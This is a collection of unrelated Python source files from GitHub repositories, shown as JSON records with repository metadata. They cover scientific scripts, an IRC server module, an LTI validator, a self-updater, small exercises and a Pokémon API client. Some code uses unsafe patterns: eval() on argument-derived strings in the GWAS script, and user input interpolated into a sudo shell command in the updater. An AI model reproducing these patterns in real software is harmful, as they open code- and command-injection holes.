col_fns = []\n for lab in label_str:\n det = lab.split(\"/\")\n if len(det)>1:\n col_names.append(det[0])\n col_fns.append(eval(det[1]))\n else:\n col_names.append(lab)\n col_fns.append(False)\n return col_names,col_fns\n\ndef errorMessage10(phe):\n print(\"\"\"\n\n A problem has been detected in file <%s> column <%s>.\n\n There is some invalid data. I regret I can't tell you which row.\n\n\n Please check -- the data should be numeric only.\n\n\n If there is missing data, please use NA\n\n\n\n \"\"\"%(args.data,phe))\n\n\nargs = parseArguments()\n\nTAB =chr(9)\nEOL=chr(10)\n\n\nphenos = [args.pheno]\nuse = [\"FID\",\"IID\"]\nif args.cov_list:\n phenos+= list(set([x for x in args.cov_list.split(\",\") if len(x)>0]))\n\n#read of fam \nreadfam=open(args.inp_fam)\nlisteFID=[]\nfor Lines in readfam :\n SplL=Lines.split()\n listeFID.append(SplL[0]+\"-\"+SplL[1])\nreadfam.close()\n\nreaddata=open(args.data)\nEnteteFile=readdata.readline().split()\nUsePos=[]\n## search position of interest\nuseAll=use+phenos\nfor Ent in useAll :\n if Ent not in EnteteFile :\n sys.exit(EOL*3+\"column %s not find in file %s\"%(Ent,args.data))\n UsePos.append(EnteteFile.index(Ent))\n\nwritenewdata=open(args.dataout,'w')\nwritenewdata.write(\"\\t\".join(useAll)+\"\\n\")\nwritelind=open(args.lindout,'w')\nfor line in readdata : \n splline=line.split() \n if splline[UsePos[0]]+\"-\"+splline[UsePos[1]] in listeFID:\n if sum([check_missing(splline[x]) for x in UsePos[2:]])==0 :\n NewInf=[splline[x] for x in UsePos]\n writelind.write(NewInf[0]+\"\\t\"+NewInf[1]+\"\\n\")\n writenewdata.write(\"\\t\".join(NewInf)+\"\\n\")\n\nwritenewdata.close()\nwritelind.close()\nreaddata.close()\n\n\n\n\n\n\n","repo_name":"h3abionet/h3agwas","sub_path":"assoc/bin/list_ind_nomissing.py","file_name":"list_ind_nomissing.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"68"} +{"seq_id":"15637337550","text":"from mammon.utility import CaseInsensitiveList\n\ndefault_whois_format = 'is a {role}.'\ndefault_vowel_whois_format = 'is an {role}.'\n\nclass Role:\n def __init__(self, ctx, name, roles=None, extends=None, **kwargs):\n self.ctx = ctx\n self.name = name\n\n # defaults\n self.metakeys_get = []\n self.metakeys_set = []\n self.metakeys_access = []\n self.capabilities = []\n self.title = ''\n self.whois_format = None\n\n for k, v in kwargs.items():\n if v:\n setattr(self, k, v)\n\n # metadata\n for key in self.metakeys_access:\n if key not in self.metakeys_get:\n self.metakeys_get.append(key)\n if key not in self.metakeys_set:\n self.metakeys_set.append(key)\n del self.metakeys_access\n\n self.metakeys_get = CaseInsensitiveList(self.metakeys_get)\n self.metakeys_set = CaseInsensitiveList(self.metakeys_set)\n\n # automatically choose a/an for whois message\n if self.whois_format is None:\n self.whois_format = default_whois_format\n for character in self.title:\n if character.isalpha() and character.lower() in ['a', 'e', 'i', 'o', 'u']:\n self.whois_format = default_vowel_whois_format\n break\n elif character.isalpha():\n break\n\n self.whois_line = self.whois_format.format(role=self.title)\n\n # extending roles\n if roles is None:\n roles = self.ctx.roles\n\n if extends and extends in roles:\n role = roles.get(extends)\n for capability in role.capabilities:\n if capability not in self.capabilities:\n self.capabilities.append(capability)\n for key in role.metakeys_get:\n if key not in self.metakeys_get:\n self.metakeys_get.append(key)\n for key in role.metakeys_set:\n if key not in self.metakeys_set:\n self.metakeys_set.append(key)\n elif extends:\n print('mammon: error: error in role', name, '- extending role', extends, 'does not exist')\n","repo_name":"mammon-ircd/mammon","sub_path":"mammon/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"68"} +{"seq_id":"315947714","text":"import datetime\nimport logging\n\nfrom django.core.cache import caches\nfrom oauthlib import oauth1\n\nfrom lti_provider.models import Consumer\nfrom lti_provider import lti_settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass RequestValidator(oauth1.RequestValidator):\n\n def __init__(self):\n super(RequestValidator, self).__init__()\n self.consumer = None\n self.cache = caches['lti_cache']\n\n @property\n def enforce_ssl(self):\n try:\n ssl = lti_settings.LTI_SSL\n except AttributeError:\n ssl = True\n return ssl\n\n def validate_timestamp_and_nonce(self, client_key, timestamp, nonce, request):\n \"\"\"\n Validate LTI request's timestamp and nonce\n\n Timestamp is validated to be equal or greater than the timestamp used in previous requests from certain\n LTI Consumer.\n\n Nonce is validating to be unique in the time frame which is by default equal to 10 seconds.\n Time frame could be configured in the StarCellBio settings as a TIMEOUT parameter of the CACHES['lti_cache']\n\n :param client_key: client key from LTI request\n :param timestamp: timestamp from LTI request\n :param nonce: nonce from LTI request\n :param request: LTI request\n :return: boolean flag\n \"\"\"\n message = \"LTI request's {} is not valid.\"\n\n logger.debug('Timestamp validating is started.')\n timestamp = int(timestamp)\n timestamp_key = '{}_timestamp'.format(client_key)\n cache_timestamp = self.cache.get(timestamp_key, timestamp)\n if cache_timestamp > timestamp:\n logger.debug(message.format('timestamp'))\n return False\n self.cache.set(timestamp_key, timestamp)\n logger.debug('Timestamp is valid.')\n\n logger.debug('Nonce validating is started.')\n if self.cache.get(nonce):\n logger.debug(message.format('nonce'))\n return False\n self.cache.set(nonce, 1)\n logger.debug('Nonce is valid.')\n return True\n\n def validate_client_key(self, client_key, request):\n \"\"\"\n Validate client key exists and is not expired\n\n :param client_key: client key from LTI request\n :param request: LTI request\n :return: boolean flag\n \"\"\"\n logger.debug('Consumer key relevance validating is started.')\n try:\n self.consumer = Consumer.objects.get(consumer_key=client_key)\n except Consumer.DoesNotExist:\n logger.error('Consumer with the key {} is not found.'.format(client_key))\n return False\n today = datetime.date.today()\n consumer_expired_date = self.consumer.expiration_date\n if consumer_expired_date and consumer_expired_date < today:\n logger.error('Consumer Key is expired.')\n return False\n return True\n\n def get_client_secret(self, client_key, request):\n \"\"\"\n Retrieve secret key storing in the LTI Consumer\n\n :param client_key: client key from LTI request\n :param request: LTI request\n :return: secret key\n \"\"\"\n logger.debug('Client secret getting is started.')\n return self.consumer.consumer_secret\n","repo_name":"starteam/starcellbio_html","sub_path":"lti_provider/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19209103531","text":"from collections.abc import Iterable\nfrom typing import TYPE_CHECKING\n\n\nif TYPE_CHECKING:\n import dbus\n\n\ndef _get_bus() -> \"dbus.SystemBus\":\n import dbus\n\n return dbus.SystemBus()\n\n\nclass LogindDBusException(RuntimeError):\n \"\"\"Indicates an error communicating to Logind via DBus.\"\"\"\n\n\ndef list_logind_sessions() -> Iterable[tuple[str, dict]]:\n \"\"\"List running logind sessions and their properties.\n\n Returns:\n list of (session_id, properties dict):\n A list with tuples of sessions ids and their associated properties\n represented as dicts.\n \"\"\"\n import dbus\n\n try:\n bus = _get_bus()\n login1 = bus.get_object(\"org.freedesktop.login1\", \"/org/freedesktop/login1\")\n\n sessions = login1.ListSessions(dbus_interface=\"org.freedesktop.login1.Manager\")\n\n results = []\n for session_id, path in [(s[0], s[4]) for s in sessions]:\n session = bus.get_object(\"org.freedesktop.login1\", path)\n properties_interface = dbus.Interface(\n session, \"org.freedesktop.DBus.Properties\"\n )\n properties = properties_interface.GetAll(\"org.freedesktop.login1.Session\")\n results.append((session_id, properties))\n except dbus.exceptions.DBusException as error:\n raise LogindDBusException(error) from error\n\n return results\n","repo_name":"languitar/autosuspend","sub_path":"src/autosuspend/util/systemd.py","file_name":"systemd.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"68"} +{"seq_id":"38402379908","text":"import numpy as np\n\nimport pandas as pd\nimport keras\nimport tensorflow as tf\nimport keras.backend as K\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils.vis_utils import plot_model\n\nfrom skopt.space import Space\nfrom skopt.sampler import Lhs\n\nfrom tauGrad import *\n\n\"\"\"\nGiven tau_w(u_LES, h) through an implicit equation \nwe want to convert it into tau_w(u_LES, u_w, h)\nsuch that u_w \\cdot tau_w > 0\nto ensure kinetic energy stability\nStep 1:\nQuestion: Can a neural network approximate the law of the wall?\nAnswer: It requires some tuning, but seems to give reasonable results\nStep 2:\nQuestion: Can we customize the neural network so that tau.u_w is always positive?\nStep 3:\nNon-dimensionalize and check if it generalizes\n\"\"\"\n\nwm_data = pd.read_csv(\"wm_data.csv\")\n\nx_smpls = pd.DataFrame(data=wm_data, columns=[\"h\", \"u_L\", \"u_w\"]) \ny = pd.DataFrame(data=wm_data, columns=[\"tau\"]) \n\n# define the keras model\nmodel = Sequential()\n# Add layers\n\"\"\"\nRepeat a few times before finalizing network \n\"\"\"\nmodel.add(Dense(15, input_dim=3, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense( 1, activation='tanh'))\n\n#Examine the model\nprint(model.summary())\n\n\n########################################\n## Test a functionality\ndef mean_pred(y_true, y_pred):\n return K.mean(y_pred)\n########################################\n\n########################################\n#First let us do a custom loss function\n# Define custom loss\ndef custom_loss():\n\n def loss(y_true,y_pred):\n return K.mean( K.square(K.square( y_pred ) - y_true) )\n\n # Return a function\n return loss\n\n## END FUNCTION \n########################################\n\n# compile the keras model\n#model.compile(loss=custom_loss(), optimizer='adam', metrics=[mean_pred])\nmodel.compile(loss=custom_loss(), optimizer='adam')\n# fit the keras model on the dataset\nmodel.fit(x_smpls, y, validation_split=0.3, epochs=50, verbose=2)\n\nweights = model.get_weights()\n\nspace = Space([(10., 100.), (2., 4.), (-1., 1.)])\nlhs = Lhs(lhs_type=\"classic\", criterion=None)\nx_n = lhs.generate(space.dimensions, 10)\n\nx_tst = pd.DataFrame(data=x_n, columns=[\"h\", \"u_L\", \"u_w\"]) \nn_smpls = x_smpls.shape[0]\n\ny_prd = K.square( model.predict(x_tst) )\n\nnu = 0.001\nfor it, i in enumerate(x_n):\n h = i[0]\n u_L = i[1]\n\n tau = getTau(nu, h, u_L) \n\n tf.print(i, tau, [y_prd[it]])\n\n\n\n","repo_name":"vikramsg/Experiments","sub_path":"python/ML/wm/run_keras.py","file_name":"run_keras.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"12416552127","text":"from LibPeer.Networks import Network\nfrom LibPeer.Formats.BinaryAddress import BinaryAddress\nfrom LibPeer.Logging import log\n\nimport socket\nimport threading\nimport rx\nimport traceback\n\nclass Ipv4(Network):\n identifier = b\"IPv4\"\n\n def __init__(self, options: dict):\n super().__init__(options)\n self._socket = None\n\n\n def go_up(self) -> bool:\n \"\"\"Attempt to get the network ready to used. Returns true on success\"\"\"\n try:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._socket.bind((self.options[\"address\"], self.options[\"port\"]))\n self.up = True\n\n threading.Thread(target=self._listen).start()\n return True\n\n except:\n return False\n\n \n def _listen(self):\n while self.up:\n try:\n data, addr = self._socket.recvfrom(65536)\n address = BinaryAddress(self.identifier, addr[0].encode(\"utf-8\"), str(addr[1]).encode(\"utf-8\"))\n self.incoming.on_next((data, address))\n\n except Exception as e:\n log.error(\"Exception on listener thread: \" + str(e))\n tb = traceback.format_exc()\n for line in tb.split(\"\\n\"):\n log.error(line)\n \n log.info(\"Listening stopped.\")\n\n\n def go_down(self,):\n \"\"\"Shut down the network interface\"\"\"\n self.up = False\n self._socket.close()\n\n\n def send(self, data: bytes, address: BinaryAddress) -> rx.Observable:\n \"\"\"Send the specified data to the specified address\"\"\"\n def send_it():\n self._socket.sendto(data, (address.network_address, int(address.network_port)))\n\n return rx.Observable.from_callable(send_it)\n","repo_name":"Tilo15/LibPeer-Python","sub_path":"LibPeer/Networks/Ipv4/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2717117033","text":"import glob\nimport os\nimport shutil\nimport sys\nfrom base64 import b64decode\n\nimport requests\nimport simplejson as json\nfrom packaging import version\n\nfrom the_challenge import __version__\nfrom the_challenge.misc import get_most_recent_version_and_files, check_internet_connection\n\n\n# FUNCTIONS\ndef update_the_challenge():\n \"\"\"\n Updates the local copy of The Challenge.\n \"\"\"\n\n # Check if the user is online\n if not check_internet_connection():\n print(\"You are not connected to the internet. Try again later.\")\n sys.exit()\n\n # Get the latest version\n most_recent_version, most_recent_files = get_most_recent_version_and_files()\n\n # Get local version\n local_version = __version__\n\n # Check if local version is smaller than the GitHub version\n if version.parse(local_version) < version.parse(most_recent_version):\n print(f\"There is a new version, {most_recent_version}, available.\\n(Installed Version: {__version__})\\n\")\n\n while True:\n print(\"Do you want to update to the new version?\")\n want_to_update = input(\"[Y]es or [N]o: \").upper()\n\n if want_to_update not in [\"Y\", \"N\"]:\n print(\"Please enter either 'Y' or 'N'.\\n\")\n elif want_to_update == \"N\":\n print(\"Keeping local version. Quitting now.\")\n sys.exit()\n else:\n print(\"Starting update process...\")\n break\n else:\n print(\"You are already on the latest version. Quitting the program now.\")\n sys.exit()\n\n print()\n\n # Get the latest distribution file\n distribution_url = \"\"\n for file in most_recent_files:\n if file[\"path\"].find(\"The-Challenge-Production-Server_\") != -1:\n distribution_url = file[\"url\"]\n break\n\n # Download the latest distribution\n if distribution_url != \"\":\n print(\"Downloading latest distribution...\")\n download_request = requests.get(distribution_url)\n download_request.raise_for_status()\n print(\"Done!\")\n\n print(\"Writing distribution package contents to file...\")\n with open(\"./The-Challenge_Latest-Dist.tar.gz\", \"wb+\") as f:\n f.write(b64decode(json.loads(download_request.text)[\"content\"]))\n f.close()\n print(\"Done!\")\n\n else:\n print(\"Can't get the latest distribution. Try again later.\")\n sys.exit()\n\n # Extract the latest distribution\n print(\"Extracting contents of latest distribution...\")\n shutil.unpack_archive(\"The-Challenge_Latest-Dist.tar.gz\", \"./extracted\")\n os.remove(\"./The-Challenge_Latest-Dist.tar.gz\")\n print(\"Done!\")\n\n # Recursively try to find the wheel file in the extracted folder\n try:\n latest_wheel_file = [f for f in glob.glob(\"./extracted/\" + \"**/*.whl\", recursive=True)][0]\n\n # Once found install it using pip\n os.system(f\"pip install -U {latest_wheel_file}\")\n\n print(\"The update was completed successfully.\")\n\n except IndexError:\n print(\"The latest distribution file cannot be found. Quitting now...\")\n sys.exit()\n\n # Clean up\n shutil.rmtree(\"./extracted\")\n\n # Offer to automatically restart the service\n print(\"\\n!!! IMPORTANT !!!\")\n print(\"Only answer 'Y' to the following prompt if you (a) are on Ubuntu; (b) have a systemd service that \"\n \"hosts The Challenge's server; and (c) are an administrator that can use the 'sudo' command.\")\n print(\"!!! IMPORTANT !!!\\n\")\n\n while True:\n print(\"Would you like to restart the systemd service?\")\n confirm_systemd_name = input(\"[Y]es or [N]o: \").upper()\n\n if confirm_systemd_name not in [\"Y\", \"N\"]:\n print(\"Please enter either 'Y' or 'N'.\\n\")\n elif confirm_systemd_name == \"N\":\n print(\"Quitting now.\")\n sys.exit()\n else:\n break\n\n # Ask user to input the systemd service name\n while True:\n print(\"Please enter the systemd service name.\")\n systemd_service_name = input(\"?> \")\n\n if systemd_service_name == \"\":\n print(\"Please enter the name.\")\n else:\n print(\"\\nPlease confirm that you want to restart the systemd service named:\")\n print(f\"'{systemd_service_name}'\")\n\n while True:\n confirm_systemd_name = input(\"[Y]es or [N]o: \").upper()\n\n if confirm_systemd_name not in [\"Y\", \"N\"]:\n print(\"Please enter either 'Y' or 'N'.\\n\")\n print(\"Please confirm the systemd service name.\")\n elif confirm_systemd_name == \"N\":\n print(\"Disregarding current input of the systemd service name.\")\n break\n else:\n os.system(f\"sudo systemctl restart {systemd_service_name}\")\n print(\"The systemd service has been restarted. Quitting.\")\n sys.exit()\n","repo_name":"PhotonicGluon/The-Challenge","sub_path":"the_challenge/commandLine.py","file_name":"commandLine.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29250047702","text":"class Solution:\n def shortestDistance(self, maze: List[List[int]], start: List[int], destination: List[int]) -> int:\n \n ROWS, COLS = len(maze), len(maze[0])\n \n dist = [[float(\"inf\")] * COLS for _ in range(ROWS)]\n dist[start[0]][start[1]] = 0\n Q = deque([(start[0], start[1])])\n \n while Q:\n row, col = Q.popleft()\n \n for x, y in (1, 0), (-1, 0), (0, 1), (0, -1):\n r, c = row + x, col + y\n count = 0\n while 0 <= r < ROWS and 0 <= c < COLS and maze[r][c] == 0:\n r += x\n c += y\n count += 1\n\n r -= x\n c -= y\n \n if dist[row][col] + count < dist[r][c]:\n Q.append((r, c))\n dist[r][c] = dist[row][col] + count\n \n ret = dist[destination[0]][destination[1]]\n \n return ret if ret != float(\"inf\") else -1\n \n","repo_name":"shivaAcharya/LeetCode","sub_path":"505-the-maze-ii/505-the-maze-ii.py","file_name":"505-the-maze-ii.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73200357338","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport re\nimport os\ndef process_excel_data(file_path, x_column, y_column):\n # 读取Excel文件\n data = pd.read_excel(file_path)\n # 如果x轴对应的是数字,则跳过这一行\n if isinstance(data[x_column].iloc[0], (int, float)):\n print(\"X-axis data is numeric, skipping the plot.\")\n return\n\n # 设置中文字体\n plt.rcParams['font.family'] = 'SimHei' # 设置为中文字体\n plt.rcParams['font.size'] = 8 # 设置字体大小\n\n # 提取指定的两列数据,并进行去重和求和操作\n grouped_data = data.groupby(x_column)[y_column].sum()\n y_data = [item for item in grouped_data.index.astype(str) if \"行业\" not in item or len(item) > 2]\n x_data = [int(re.sub(r'\\D', '', str(item))) for item in grouped_data.values.astype(str) if '-' not in str(item)]\n min_y_value = 0 # 设置y轴最低值为0\n\n # 绘制图表\n fig, ax = plt.subplots(figsize=(10, 6)) # 设置图表尺寸\n ax.bar(y_data, x_data)\n ax.set_xlabel('行业')\n ax.set_ylabel('数量')\n ax.tick_params(axis='x', rotation=90) # 设置x轴标签竖直显示\n ax.set_ylim(bottom=min_y_value) # 设置y轴最低值\n today = datetime.today().strftime('%Y-%m-%d') # 将当前日期转化为指定格式的字符串\n ax.set_title(f'({today})') # 使用当前日期作为标题\n plt.tight_layout() # 自动调整图表布局,防止标签重叠\n\n # 添加滚动条\n plt.subplots_adjust(bottom=0.2) # 留出底部空间放置滚动条\n ax.set_xlim([-1, len(y_data)])\n print(today)\n plt.savefig(f'{today}.png') # 将生成的图表保存到本地\n plt.show()\n\nfile_path = \"../Futrue/每日咨询相关股.xlsx\"\nx_column = '行业' # Assuming the column name is 'C', if it's a different name, replace it with the actual column name.\ny_column = '数量' # Assuming the column name is 'B', if it's a different name, replace it with the actual column name.\n\nprocess_excel_data(file_path, x_column, y_column)","repo_name":"Create-your-name/Quantitative_stocks","sub_path":"Util/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38613953845","text":"import numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.animation as animation\nimport re\nfrom math import *\nfrom track_utils import TrackingAnalysis\nfrom os.path import join\n\ndef update_scatter(num, track, points, line, frame_ini, mov):\n print('frame->'+str(num))\n x, y, z = track.getAllPositions(num+frame_ini+1, filtered = False)\n points._offsets3d = (x, y, z)\n\n line.set_data(mov[1, :num], mov[2, :num])\n line.set_3d_properties(mov[3,:num])\n\n return points, line\n\ndef main(*args):\n\n date = \"2015_6_22_15_33_43\"\n frame_ini = 1\n frame_end = 20\n back = True\n if len(args) == 3:\n frame_ini = int(args[0])\n frame_end = int(args[1])\n date = str(args[2])\n elif len(args) > 3:\n if (args[3].lower() == 'false') or (str(args[3]) == '0'):\n back = False\n\n min_frames = 5\n\n # Define filenames\n ini_config = readConfigFile(join('ini_files', 'ini_config.ini'))\n results_folder = ini_config['results_folder']\n folder = join(results_folder,\"GMEMtracking3D_\" + date)\n\n # read positions and apply filter\n track = TrackingAnalysis(folder)\n track.minFrameFilter(min_frames)\n\n x, y, z = track.getAllPositions(frame_ini, filtered = False)\n \n # mov is an array (4, time), where 4 is:\n # 0 -> frame, 1-3 -> x,y,z\n mov = np.asarray(track.getWholeMovement(track.index_filter[0]))\n\n # set up figure\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n points = ax.scatter(x, y, z, animated=True)\n line, = ax.plot(mov[1, 0:1], mov[2, 0:1], mov[3, 0:1])\n ani = animation.FuncAnimation(fig, update_scatter, frames=frame_end-frame_ini, fargs = (track, points, line, frame_ini, mov),\n interval=20, blit=False)\n\n FFMpegWriter = animation.writers['ffmpeg']\n metadata = dict(title='Movie Test', artist='Matplotlib',\n comment='Moving cells')\n writer = FFMpegWriter(fps=5, metadata=metadata)\n ani.save('basic_animation.mp4', writer=writer)\n\nif __name__ == \"__main__\":\n import sys\n main(*sys.argv[1:])","repo_name":"epolimpio/image_extraction","sub_path":"scatter_animation.py","file_name":"scatter_animation.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73161253335","text":"class node:\n def __init__(self,data,next = None ):\n self.data = data\n self.next = next\n def __str__(self):\n last=self\n while (last.next is not None):\n print(last.data,end=\" \")\n last=last.next\n print(last.data,end=\" \")\n return \"\"\ndef createList(l=[]):\n for i in range(len(l)):\n if i == 0:\n headnode=node(l[i])\n last=headnode\n else :\n newnode=node(l[i])\n last.next=newnode\n last=last.next\n return headnode\n\ndef printList(H):\n print(H)\n\ndef mergeOrderesList(p,q):\n lastp=p\n lastq=q\n if lastp.data>lastq.data:\n headnode=node(lastq.data)\n lastm=headnode\n lastq=lastq.next\n else :\n headnode=node(lastp.data)\n lastm=headnode\n lastp=lastp.next\n \n while True:\n if lastp is None and lastq is None:\n return headnode\n elif lastp is None:\n newnode=node(lastq.data)\n lastq=lastq.next\n lastm.next=newnode\n lastm=lastm.next\n elif lastq is None:\n newnode=node(lastp.data)\n lastp=lastp.next\n lastm.next=newnode\n lastm=lastm.next\n elif int(lastp.data)>int(lastq.data):\n newnode=node(lastq.data)\n lastq=lastq.next\n lastm.next=newnode\n lastm=lastm.next\n else :\n newnode=node(lastp.data)\n lastp=lastp.next\n lastm.next=newnode\n lastm=lastm.next\n\n\nif __name__==\"__main__\":\n inp = input(\"Enter 2 Lists : \").split(\" \")\n L1=inp[0].split(\",\")\n L2=inp[1].split(\",\")\n #################### FIX comand #################### \n # input only a number save in L1,L2\n LL1 = createList(L1)\n LL2 = createList(L2)\n print('LL1 : ',end='')\n printList(LL1)\n print('LL2 : ',end='')\n printList(LL2)\n m = mergeOrderesList(LL1,LL2)\n print('Merge Result : ',end='')\n printList(m)","repo_name":"maimoke/DATA-STRUCTURES-AND-ALGORITHM","sub_path":"code/63010177_Lab5_3.py","file_name":"63010177_Lab5_3.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35682109392","text":"# Using univariate histogram plot\n\nfrom matplotlib import pyplot as plt\nimport pandas\n\nfilename = 'indians-diabetes.data.csv'\n\nhnames = [ 'preg' , 'plas' , 'pres' , 'skin' , 'test' , 'mass' , 'pedi' , 'age' ,'class']\n\ndf = pandas.read_csv(filename , names=hnames)\nprint(type(df))\n\ndf.hist() # To create histogram to understand the pattern of data\n\nplt.show()\n","repo_name":"EnigmaVSSUT/Hacktoberfest2019","sub_path":"Python/MLAlgos/ML19.py","file_name":"ML19.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"68"} +{"seq_id":"23489993615","text":"import requests \n\ndef opciones():\n r = int(input('\\n¿Desea regresar a la pantalla principal? 1) Sí 2) No : '))\n if r==1:\n interfaz()\n else:\n print('\\nMuchas gracias por usar nuestro aplicativo')\n\ndef interfaz():\n print('\\nQUIÉN ES ESE POKEMON - MODULO 1 - BACK END - SILABUZ')\n print('Creadores: Jhonatan Panta | Kelly Romero')\n print('\\nSeleccione la opción de la búsqueda que desea realizar:')\n print('\\nOpción 1) Búsqueda por Generación\\nOpción 2) Búsqueda por forma\\nOpción 3) Búsqueda por habilidad\\nOpción 4) Búsqueda por Hábitat\\nOpción 5) Búsqueda por Tipo')\n op = int(input('Ingrese el número de la opción elegida: '))\n if op == 1:\n print('\\n:: LISTADO DE POKEMONES POR GENERACIÓN ::')\n pokemon_generacion()\n elif op == 2:\n print('\\n:: LISTADO DE POKEMONES POR FORMA ::')\n pokemon_forma()\n elif op == 3:\n print('\\n:: LISTADO DE POKEMONES POR HABILIDADES ::')\n pokemon_habilidades()\n elif op == 4:\n print('\\n:: LISTADO DE POKEMONES POR HABITAT ::')\n pokemon_habitat()\n elif op == 5:\n print('\\n:: LISTADO DE POKEMONES POR TIPO ::')\n pokemon_tipo()\n else:\n opciones()\n\ndef pokemon_generacion():\n try:\n print('\\nSeleccione la generación que desea listar')\n r = int(input('Ingrese de la 1era a la 8va generación: '))\n url = \"https://pokeapi.co/api/v2/generation/\"+str(r)+\"/\"\n r = requests.get(url)\n data = r.json()\n\n for indice, elemento in enumerate (data['pokemon_species']):\n print(indice+1,'->','Nombre: ',elemento['name'],'| URL: ', elemento['url'])\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ndef pokemon_habitat():\n try:\n print('Seleccione el habitat que desea listar\\nOpción 1) Cave\\nOpción 2) Forest\\nOpción 3) Grassland\\nOpción 4) Mountain\\nOpción 5) Rare\\nOpción 6) Rough-terrain\\nOpción 7) Sea\\nOpción 8) Urban\\nOpción 9) Waters-edge')\n r = int(input('Ingrese el número de opción elegida: '))\n url = \"https://pokeapi.co/api/v2/pokemon-habitat/\"+str(r)+\"/\"\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n') \n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon_species']):\n print(indice+1,'->','Nombre: ',elemento['name'],'| URL: ', elemento['url'])\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally: \n opciones()\n\ndef pokemon_tipo():\n try:\n url_opc = 'https://pokeapi.co/api/v2/type'\n data_opc = requests.get(url_opc).json()\n print('Seleccione el habitat que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Ingrese el número de la opción elegida: '))\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n')\n url = \"https://pokeapi.co/api/v2/type/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon']):\n print(indice+1,'->',elemento['pokemon']['name'], \"| URL: \",elemento['pokemon']['url'] )\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally: \n opciones()\n\ndef pokemon_habilidades():\n try:\n url_opc = 'https://pokeapi.co/api/v2/ability/?offset=0&limit=267'\n data_opc = requests.get(url_opc).json()\n print('Seleccione la habilidad que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Seleecione la opción que desea listar: '))\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n')\n url = \"https://pokeapi.co/api/v2/ability/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon']):\n print(indice+1,'->',elemento['pokemon']['name'], \"| URL: \",elemento['pokemon']['url'] )\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ndef pokemon_forma():\n try:\n url_opc = 'https://pokeapi.co/api/v2/pokemon-form/?offset=0&limit=1323'\n data_opc = requests.get(url_opc).json()\n print('Seleccione la forma del pokemon que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Seleecione la opción que desea listar: '))\n if num>905:\n num += 9095\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n') \n url = \"https://pokeapi.co/api/v2/pokemon-form/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n print('Pokemon :',data['pokemon']['name'])\n print('Nombre de forma : ',data['form_name'])\n print('Tipos : ',end=\"\")\n for i in data['types']:\n print(i['type']['name'],end=\" | \")\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ninterfaz()","repo_name":"jhonatan0710/Trabajo-M1-BE-Silabuz","sub_path":"tarea2.py","file_name":"tarea2.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18588407555","text":"import gzip\nimport json\nfrom tempfile import NamedTemporaryFile\nfrom unittest.mock import patch\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom api.openapi.view import get_api_json\n\n\ndef get_api_json_error(path):\n \"\"\"Raise error for mocked response.\"\"\"\n raise FileNotFoundError()\n\n\nclass OpenAPIViewTest(TestCase):\n \"\"\"Tests the openapi view.\"\"\"\n\n @patch('api.openapi.view.get_api_json', 